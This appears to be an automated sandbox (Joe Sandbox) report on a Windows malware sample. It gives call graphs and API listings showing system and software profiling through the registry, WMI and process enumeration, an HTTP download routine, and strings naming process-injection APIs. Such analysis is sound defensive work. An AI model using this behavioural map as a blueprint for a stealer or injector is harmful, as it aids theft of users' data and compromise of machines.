22694 18eaa8 22679->22694 22682 18ec80 22680->22682 22684 18ebfe StrCmpCA 22681->22684 22681->22694 23451 18e15b 22682->23451 22684->22694 22685 181cfd lstrcpyA 22685->22694 22687 1904bc lstrcpyA 22687->22694 22691 19059c 2 API calls 22691->22694 22694->22678 22694->22679 22694->22681 22694->22684 22694->22685 22694->22687 22694->22691 22695 1905de lstrlenA lstrcpyA lstrcatA 22694->22695 22700 190562 lstrcpyA 22694->22700 22708 1904ee lstrcpyA 22694->22708 23567 18c74f 230 API calls 22694->23567 23568 18c931 231 API calls 22694->23568 23569 18d97f 226 API calls 22694->23569 22695->22694 22700->22694 22708->22694 23008->21845 23010 19d05a UnDecorator::getZName 5 API calls 23009->23010 23011 1925d6 23010->23011 23011->21063 23011->21068 23013 1904bc lstrcpyA 23012->23013 23014 182a05 23013->23014 23014->21946 23016 1904bc lstrcpyA 23015->23016 23017 182a16 23016->23017 23017->21946 23019 1904ee lstrcpyA 23018->23019 23020 196dee 23019->23020 23021 1904ee lstrcpyA 23020->23021 23022 196df9 23021->23022 23023 1904ee lstrcpyA 23022->23023 23024 196e04 23023->23024 23024->21947 23025->21946 23026->21946 23027->21946 23028->21946 23030 191711 23029->23030 23031 191682 23029->23031 23032 1904bc lstrcpyA 23030->23032 23033 1904bc lstrcpyA 23031->23033 23034 19171d 23032->23034 23035 191695 _memset 23033->23035 23036 19d05a UnDecorator::getZName 5 API calls 23034->23036 23046 1923aa lstrcpyA malloc strncpy 23035->23046 23037 19172a 23036->23037 23037->21969 23039 1916bf lstrcatA 23047 182920 23039->23047 23041 1916dc lstrcatA 23042 1916f9 23041->23042 23043 1904bc lstrcpyA 23042->23043 23044 191707 23043->23044 23044->23034 23045->21972 23046->23039 23048 182924 23047->23048 23048->23041 23050 184ac4 23049->23050 23050->23050 23051 184acb ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlenA InternetCrackUrlA 23050->23051 23052 184b27 23051->23052 23052->21981 23054 18806a LocalAlloc 23053->23054 23055 186724 23053->23055 23054->23055 23056 18807a CryptStringToBinaryA 23054->23056 23055->22151 23055->22163 23056->23055 23057 188091 LocalFree 23056->23057 23057->23055 23058->22288 23059->22290 23061 19d05a UnDecorator::getZName 5 API calls 23060->23061 23062 190d01 23061->23062 23062->22343 23221 1a3c60 23063->23221 23066 191605 RegQueryValueExA 23067 191626 RegCloseKey CharToOemA 23066->23067 23068 19d05a UnDecorator::getZName 5 API calls 23067->23068 23069 191657 23068->23069 23069->22357 23071 192269 23070->23071 23072 19224d K32GetModuleFileNameExA CloseHandle 23070->23072 23073 1904bc lstrcpyA 23071->23073 23072->23071 23074 192275 23073->23074 23075 19d05a UnDecorator::getZName 5 API calls 23074->23075 23076 192283 23075->23076 23076->22400 23223 190beb 23077->23223 23080 190b38 RegOpenKeyExA 23082 190b58 RegQueryValueExA 23080->23082 23083 190b70 RegCloseKey 23080->23083 23081 190b31 23081->22422 23082->23083 23083->23081 23230 1af159 23084->23230 23086 1917e8 CoInitializeEx CoInitializeSecurity CoCreateInstance 23087 191840 23086->23087 23088 191848 CoSetProxyBlanket 23087->23088 23089 191939 23087->23089 23090 191878 23088->23090 23091 1904bc lstrcpyA 23089->23091 23090->23089 23095 1918ac VariantInit 23090->23095 23092 191964 23091->23092 23093 1af1b5 5 API calls 23092->23093 23094 19196b 23093->23094 23094->22436 23096 1918cb 23095->23096 23231 19172c 23096->23231 23098 1918d6 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 23099 1904bc lstrcpyA 23098->23099 23100 19192d VariantClear 23099->23100 23100->23092 23240 1af0ed 23101->23240 23103 191978 CoInitializeEx CoInitializeSecurity CoCreateInstance 23104 1919ce 23103->23104 23105 1919d6 CoSetProxyBlanket 23104->23105 23108 191a68 23104->23108 23109 191a06 23105->23109 23106 1904bc lstrcpyA 23107 191a93 23106->23107 23107->22449 23108->23106 23109->23108 23110 191a2e VariantInit 23109->23110 23111 191a4d 23110->23111 23241 191d17 LocalAlloc CharToOemW 23111->23241 23113 191a55 23114 1904bc lstrcpyA 23113->23114 23115 191a5c VariantClear 23114->23115 23115->23107 23116->22477 23118 1904bc lstrcpyA 23117->23118 23119 1915a2 23118->23119 23119->22492 23121 1904bc lstrcpyA 23120->23121 23122 190dd7 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 23121->23122 23123 190e11 23122->23123 23131 190ec2 23122->23131 23126 190e17 GetLocaleInfoA 23123->23126 23129 1905de lstrlenA lstrcpyA lstrcatA 23123->23129 23130 190562 lstrcpyA 23123->23130 23123->23131 23124 190eda 23127 19d05a UnDecorator::getZName 5 API calls 23124->23127 23125 190ece LocalFree 23125->23124 23126->23123 23128 190eea 23127->23128 23128->22506 23129->23123 23130->23123 23131->23124 23131->23125 23133 190d5b 23132->23133 23134 190d3f wsprintfA 23132->23134 23135 19d05a UnDecorator::getZName 5 API calls 23133->23135 23134->23133 23136 190d68 23135->23136 23136->22534 23138 190f69 RegQueryValueExA 23137->23138 23139 190f81 RegCloseKey 23137->23139 23138->23139 23139->22551 23141 191051 GetLogicalProcessorInformationEx 23140->23141 23142 19101d GetLastError 23141->23142 23143 19105c 23141->23143 23144 1910c8 23142->23144 23145 19102c 23142->23145 23244 191b30 GetProcessHeap HeapFree 23143->23244 23147 1910d2 23144->23147 23245 191b30 GetProcessHeap HeapFree 23144->23245 23153 191030 23145->23153 23154 19d05a UnDecorator::getZName 5 API calls 23147->23154 23148 191095 23148->23147 23152 19109e wsprintfA 23148->23152 23152->23147 23153->23141 23155 1910c1 23153->23155 23242 191b30 GetProcessHeap HeapFree 23153->23242 23243 191b4d GetProcessHeap HeapAlloc 23153->23243 23156 1910ec 23154->23156 23155->23147 23156->22566 23158 19d05a UnDecorator::getZName 5 API calls 23157->23158 23159 190fda 23158->23159 23159->22580 23246 191afb 23160->23246 23163 191134 wsprintfA 23165 19d05a UnDecorator::getZName 5 API calls 23163->23165 23166 191165 23165->23166 23166->22594 23168 1904bc lstrcpyA 23167->23168 23170 191188 23168->23170 23169 1911c8 23172 19d05a UnDecorator::getZName 5 API calls 23169->23172 23170->23169 23171 19051e 2 API calls 23170->23171 23171->23170 23173 1911d6 23172->23173 23173->22608 23175 1904bc lstrcpyA 23174->23175 23176 19149b CreateToolhelp32Snapshot Process32First 23175->23176 23177 191521 CloseHandle 23176->23177 23182 1914c3 23176->23182 23178 19d05a UnDecorator::getZName 5 API calls 23177->23178 23180 191536 23178->23180 23179 19150f Process32Next 23179->23177 23179->23182 23180->22622 23181 1905de lstrlenA lstrcpyA lstrcatA 23181->23182 23182->23179 23182->23181 23183 190562 lstrcpyA 23182->23183 23183->23182 23185 1904bc lstrcpyA 23184->23185 23186 191210 RegOpenKeyExA 23185->23186 23187 19144d 23186->23187 23201 191256 23186->23201 23189 1904ee lstrcpyA 23187->23189 23188 19125c RegEnumKeyExA 23190 191299 wsprintfA RegOpenKeyExA 23188->23190 23188->23201 23191 19145e 23189->23191 23193 1912df RegQueryValueExA 23190->23193 23194 191435 RegCloseKey 23190->23194 23198 19d05a UnDecorator::getZName 5 API calls 23191->23198 23192 191433 23195 191441 RegCloseKey 23192->23195 23196 191415 RegCloseKey 23193->23196 23197 191315 lstrlenA 23193->23197 23194->23195 23195->23187 23196->23201 23197->23196 23197->23201 23199 191478 23198->23199 23199->22636 23200 190562 lstrcpyA 23200->23201 23201->23188 23201->23192 23201->23196 23201->23200 23202 191385 RegQueryValueExA 23201->23202 23203 1905de lstrlenA lstrcpyA lstrcatA 23201->23203 23202->23196 23202->23201 23203->23201 23205 196ee9 23204->23205 23206 190562 lstrcpyA 23205->23206 23207 196f06 23206->23207 23208 190562 lstrcpyA 23207->23208 23209 196f22 23208->23209 23210 190562 lstrcpyA 23209->23210 23211 196f2d 23210->23211 23212 190562 lstrcpyA 23211->23212 23213 196f38 23212->23213 23214 196f3f Sleep 23213->23214 23216 196f4f 23213->23216 23214->23213 23215 196f6b CreateThread WaitForSingleObject 23218 1904bc lstrcpyA 23215->23218 23438 196e08 23215->23438 23216->23215 23248 19cd0d 23216->23248 23220 196f93 23218->23220 23220->22655 23222 1915e1 RegOpenKeyExA 23221->23222 23222->23066 23222->23067 23226 190b7e GetProcessHeap HeapAlloc RegOpenKeyExA 23223->23226 23225 190b2d 23225->23080 23225->23081 23227 190bd8 RegCloseKey 23226->23227 23228 190bc1 RegQueryValueExA 23226->23228 23229 190be8 23227->23229 23228->23227 23229->23225 23230->23086 23239 1af0ed 23231->23239 23233 191738 CoCreateInstance 23234 191760 SysAllocString 23233->23234 23235 1917bc 23233->23235 23234->23235 23237 19176f 23234->23237 23235->23098 23236 1917b5 SysFreeString 23236->23235 23237->23236 23238 191793 _wtoi64 SysFreeString 23237->23238 23238->23236 23239->23233 23240->23103 23241->23113 23242->23153 23243->23153 23244->23148 23245->23147 23247 191122 GlobalMemoryStatusEx 23246->23247 23247->23163 23251 19ccc5 23248->23251 23252 196f69 23251->23252 23253 19ccd4 23251->23253 23252->23215 23253->23252 23255 19c4b7 23253->23255 23256 19c4df 23255->23256 23260 19c4e9 23255->23260 23257 19d05a UnDecorator::getZName 5 API calls 23256->23257 23259 19caf0 23257->23259 23258 19c513 lstrcpyA 23258->23256 23261 19c530 23258->23261 23259->23252 23260->23256 23260->23258 23262 19c5a0 23261->23262 23390 19b8b5 9 API calls 23261->23390 23264 19c5c1 23262->23264 23265 19c5b2 23262->23265 23266 19c5d6 23264->23266 23267 19c5c6 23264->23267 23391 19bf8c 20 API calls 23265->23391 23270 19c5eb 23266->23270 23271 19c5db 23266->23271 23392 19c00b 18 API calls UnDecorator::getZName 23267->23392 23270->23256 23275 19c5f4 23270->23275 23393 19c12e 8 API calls UnDecorator::getZName 23271->23393 23272 19c5bf 23273 19c5f9 23272->23273 23273->23256 23277 19c603 lstrcpyA lstrcpyA lstrlenA 23273->23277 23394 19c1f1 8 API calls UnDecorator::getZName 23275->23394 23278 19c65b lstrcpyA 23277->23278 23279 19c643 lstrcatA 23277->23279 23280 19c6c4 23278->23280 23279->23278 23318 19ae98 23280->23318 23404 19bdc5 malloc WriteFile _memmove 23318->23404 23320 19aeb0 23405 19bdc5 malloc WriteFile _memmove 23320->23405 23322 19aec0 23406 19bdc5 malloc WriteFile _memmove 23322->23406 23324 19aed0 23407 19bdc5 malloc WriteFile _memmove 23324->23407 23326 19aee0 23408 19bdc5 malloc WriteFile _memmove 23326->23408 23328 19aef2 23409 19bdc5 malloc WriteFile _memmove 23328->23409 23330 19af04 23410 19bdc5 malloc WriteFile _memmove 23330->23410 23332 19af16 23411 19bdc5 malloc WriteFile _memmove 23332->23411 23334 19af28 23412 19bdc5 malloc WriteFile _memmove 23334->23412 23390->23262 23391->23272 23392->23272 23393->23272 23394->23273 23404->23320 23405->23322 23406->23324 23407->23326 23408->23328 23409->23330 23410->23332 23411->23334 23447 1af0ed 23438->23447 23440 196e14 lstrlenA 23444 196e30 23440->23444 23446 196e25 23440->23446 23441 1904ee lstrcpyA 23441->23444 23442 185482 45 API calls 23442->23444 23443 190562 lstrcpyA 23443->23444 23444->23441 23444->23442 23444->23443 23445 196e96 StrCmpCA 23444->23445 23445->23444 23445->23446 23447->23440 23573 187eae 11 API calls 23448->23573 23450 187efc 23450->22694 23452 18e191 _memset 23451->23452 23453 18e1d3 RegOpenKeyExA 23452->23453 23567->22694 23568->22694 23569->22694 23573->23450

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 00198995 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                        • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                        • API String ID: 2238633743-2740034357
                                                                                                                                                                        • Opcode ID: 4685673c820f8ec91281c2c6641cbe7f8e306c48c5723cc202be16ab764c7e93
                                                                                                                                                                        • Instruction ID: 42f985cebdb11a272353ec225a7db4ce3590d6c2a65c98ec4f7bb5b5c190067c
                                                                                                                                                                        • Opcode Fuzzy Hash: 4685673c820f8ec91281c2c6641cbe7f8e306c48c5723cc202be16ab764c7e93
                                                                                                                                                                        • Instruction Fuzzy Hash: C052B579903222AFDB037FA6FD499243FBEF758301B11992BE9058A270D7724864EF15
                                                                                                                                                                        Function 0019C4B7 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2124 19c4b7-19c4dd 2125 19c4e9-19c4ed 2124->2125 2126 19c4df-19c4e4 2124->2126 2128 19c4f9-19c501 2125->2128 2129 19c4ef-19c4f4 2125->2129 2127 19cae3-19caf1 call 19d05a 2126->2127 2131 19c513-19c52a lstrcpyA 2128->2131 2132 19c503-19c507 2128->2132 2129->2127 2135 19cade 2131->2135 2136 19c530 2131->2136 2132->2131 2134 19c509 2132->2134 2134->2131 2135->2127 2137 19c536-19c539 2136->2137 2138 19c53b 2137->2138 2139 19c53e-19c542 2137->2139 2138->2139 2139->2137 2140 19c544-19c556 2139->2140 2141 19c558-19c55e 2140->2141 2142 19c57b 2140->2142 2143 19c561-19c566 2141->2143 2144 19c582-19c593 2142->2144 2143->2143 2145 19c568-19c579 2143->2145 2146 19c595-19c5a2 call 19b8b5 2144->2146 2147 19c5a4 2144->2147 2145->2142 2145->2144 2146->2147 2149 19c5aa-19c5b0 2146->2149 2147->2149 2151 19c5c1-19c5c4 2149->2151 2152 19c5b2-19c5bf call 19bf8c 2149->2152 2153 19c5d6-19c5d9 2151->2153 2154 19c5c6-19c5d4 call 19c00b 2151->2154 2160 19c5f9-19c5fd 2152->2160 2157 19c5eb-19c5ee 2153->2157 2158 19c5db-19c5e9 call 19c12e 2153->2158 2154->2160 2157->2135 2163 19c5f4 call 19c1f1 2157->2163 2158->2160 2160->2127 2166 19c603-19c641 lstrcpyA * 2 lstrlenA 2160->2166 2163->2160 2167 19c65b-19c6c2 lstrcpyA 2166->2167 2168 19c643-19c655 lstrcatA 2166->2168 2169 19c6c4-19c6cb 2167->2169 2170 19c6d6-19c6f3 2167->2170 2168->2167 2169->2170 2171 19c6cd-19c6cf 2169->2171 2172 19c70a 2170->2172 2173 19c6f5-19c6fa 2170->2173 2171->2170 2175 19c710-19c81c call 19ae98 2172->2175 2173->2172 2174 19c6fc-19c708 2173->2174 2174->2175 2178 19c82f-19c847 2175->2178 2179 19c81e-19c820 call 19c331 2175->2179 2181 19c849-19c853 call 19c331 2178->2181 2182 19c858-19c873 2178->2182 2185 19c825-19c82a 2179->2185 2181->2127 2183 19c883-19c88a 2182->2183 2184 19c875-19c879 2182->2184 2188 19c88c-19c8a3 GetDesktopWindow GetTickCount srand 2183->2188 2189 19c8a4 2183->2189 2184->2183 2187 19c87b-19c881 call 19b834 2184->2187 2185->2127 2187->2183 2187->2184 2188->2189 2192 19c8a6-19c8b7 rand 2189->2192 2192->2192 2194 19c8b9-19c8c2 2192->2194 2195 19c8c5-19c8de call 19b892 2194->2195 2198 19c8e0-19c8e4 2195->2198 2199 19c900-19c908 2198->2199 2200 19c8e6-19c8ed 2198->2200 2201 19c918 2199->2201 2202 19c90a-19c911 2199->2202 2200->2199 2203 19c8ef-19c8fc call 19bdc5 2200->2203 2205 19c91a-19c92a 2201->2205 2202->2201 2204 19c913-19c916 2202->2204 2203->2199 2204->2205 2208 19c92c-19c92f 2205->2208 2209 19c954 2205->2209 2210 19c941-19c943 2208->2210 2211 19c931-19c93a call 19c372 2208->2211 2212 19c95a-19c973 call 19c331 2209->2212 2210->2212 2215 19c945-19c947 call 19c45f 2210->2215 2217 19c93f 2211->2217 2212->2127 2219 19c979-19c97f 2212->2219 2220 19c94c-19c952 2215->2220 2217->2220 2219->2185 2221 19c985-19c9b2 2219->2221 2220->2212 2222 19ca2f-19ca36 2221->2222 2223 19c9b4-19c9b7 2221->2223 2224 19ca38-19ca3d 2222->2224 2225 19ca42-19ca44 2222->2225 2226 19c9b9-19c9c0 2223->2226 2227 19c9c2-19c9d0 2223->2227 2224->2127 2228 19ca4a-19ca59 call 19b0fa 2225->2228 2229 19ca46-19ca48 2225->2229 2226->2222 2226->2227 2230 19c9de-19c9fe call 19bea5 2227->2230 2231 19c9d2-19c9d7 2227->2231 2228->2185 2236 19ca5f-19ca6a 2228->2236 2229->2224 2229->2228 2237 19ca0a-19ca19 call 19ae98 2230->2237 2238 19ca00-19ca05 2230->2238 2231->2230 2239 19ca71-19ca76 2236->2239 2237->2185 2244 19ca1f-19ca2b call 19bea5 2237->2244 2238->2127 2239->2127 2241 19ca78-19cac0 malloc call 1a70a0 malloc 2239->2241 2248 19cac9-19cad2 2241->2248 2249 19cac2-19cac5 2241->2249 2244->2239 2251 19ca2d 2244->2251 2252 19cad4 2248->2252 2253 19cac7 2248->2253 2250 19cada-19cadc 2249->2250 2250->2127 2251->2238 2252->2250 2253->2248
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: /$UT
                                                                                                                                                                        • API String ID: 0-1626504983
                                                                                                                                                                        • Opcode ID: 5bc8ff4d2c34b9de923b56164b00ac28b9c17f41d1efbfddb37095e893a9d2ff
                                                                                                                                                                        • Instruction ID: a7226390a6842c1c0e83670121a07a6c2c0a205d6424fa36f838eb8badd71a93
                                                                                                                                                                        • Opcode Fuzzy Hash: 5bc8ff4d2c34b9de923b56164b00ac28b9c17f41d1efbfddb37095e893a9d2ff
                                                                                                                                                                        • Instruction Fuzzy Hash: C20291B1E042688FDF25CF68C8807AEBBB5AF55304F0540E9D989AB246D7309E85CFD5
                                                                                                                                                                        Function 00186963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2286 186963-1869e7 call 1904ee call 184ab6 call 1904bc InternetOpenA StrCmpCA 2293 1869e9 2286->2293 2294 1869ea-1869f0 2286->2294 2293->2294 2295 186b6e-186b7a call 1904ee 2294->2295 2296 1869f6-186a1c InternetConnectA 2294->2296 2302 186b7f-186baa call 182920 * 3 call 19d05a 2295->2302 2297 186b62-186b68 InternetCloseHandle 2296->2297 2298 186a22-186a5d HttpOpenRequestA 2296->2298 2297->2295 2300 186a63-186a65 2298->2300 2301 186b56-186b5c InternetCloseHandle 2298->2301 2303 186a83-186ab4 HttpSendRequestA HttpQueryInfoA 2300->2303 2304 186a67-186a7d InternetSetOptionA 2300->2304 2301->2297 2306 186acb-186adb call 191ad2 2303->2306 2307 186ab6 2303->2307 2304->2303 2317 186bab-186bb0 2306->2317 2318 186ae1-186ae3 2306->2318 2309 186abb-186ac6 call 1904bc 2307->2309 2309->2302 2317->2309 2320 186b4a-186b50 InternetCloseHandle 2318->2320 2321 186ae5-186aea 2318->2321 2320->2301 2323 186b2b-186b48 InternetReadFile 2321->2323 2323->2320 2325 186aec-186af4 2323->2325 2325->2320 2326 186af6-186b26 call 1905de call 190562 call 182920 2325->2326 2326->2323
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
                                                                                                                                                                          • Part of subcall function 00184AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
                                                                                                                                                                          • Part of subcall function 00184AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 001869C5
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 001869DF
                                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186A0E
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00186A4D
                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00186A7D
                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186A88
                                                                                                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00186AAC
                                                                                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00186B40
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00186B50
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00186B5C
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00186B68
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
